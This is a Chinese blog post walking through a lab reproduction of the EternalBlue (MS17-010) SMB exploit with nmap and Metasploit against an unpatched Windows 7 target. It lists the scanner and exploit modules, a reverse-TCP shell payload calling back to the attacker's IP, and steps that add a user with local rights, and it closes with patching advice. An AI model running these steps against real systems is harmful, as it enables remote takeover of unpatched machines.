您的位置:首页 > 其它

阿布在漏洞复现---永恒之蓝 MS17-010

2019-08-20 21:23 281 查看
版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/leesir98/article/details/99885429

永恒之蓝复现

1.漏洞理论
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

2.复现环境
攻击机器:kali(192.168.65.151)
实验靶机:官方原版WIN7(192.168.65.153),关闭防火墙,未打补丁
3.实验步骤
信息收集
1)kali环境下用nmap扫描靶机;
默认扫描sS

2) kali终端打开metasploit;
输入命令:msfconsole


3) 搜索ms17-010相关模块;
search ms17-010

利用上图框出来的模块,进行漏洞发现
这个模块就是一个ms17-010漏洞扫描模块,利用它可以确定目标是否存在该漏洞
use auxiliary/scanner/smb/smb_ms17_010

4) 查看需要配置那些参数;
show options

由此可见,需要配置rhosts这个参数,这个参数就是即将要扫描的网段,如果只有一个主机,只需要给出该主机的IP得知
5) 设置IP地址,并启用扫描;
set rhosts 192.168.146.136
exploit


如果是出现+则表明该主机存在445端口漏洞
尝试攻击:

6)接下来我们使用漏洞利用模块来进行getshell
6.1选择模块:use exploit/windows/smb/ms17_010_eternalblue
6.2选择payload:set payload generic/shell_reverse_tcp
6.3设置rhost(靶机ip):set rhost 192.168.146.136
6.4设置lhost(攻击机ip): set lhost 192.168.146.128
6.5实施攻击:exploit

这一句表示永恒之蓝攻击成功
这一句建立一个会话名称为session的会话

给靶机添加用户

给添加本地权限

添加成功

永恒之蓝事件后续
微软已于2017 年 3 月 14 日发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新Windows系统补丁;务必不要轻易打开doc、rtf等后缀的附件;内网中存在使用相同账号、密码情况的机器请尽快修改密码,未开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作,可以下载“永恒之蓝”漏洞修复工具进行漏洞修复。

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: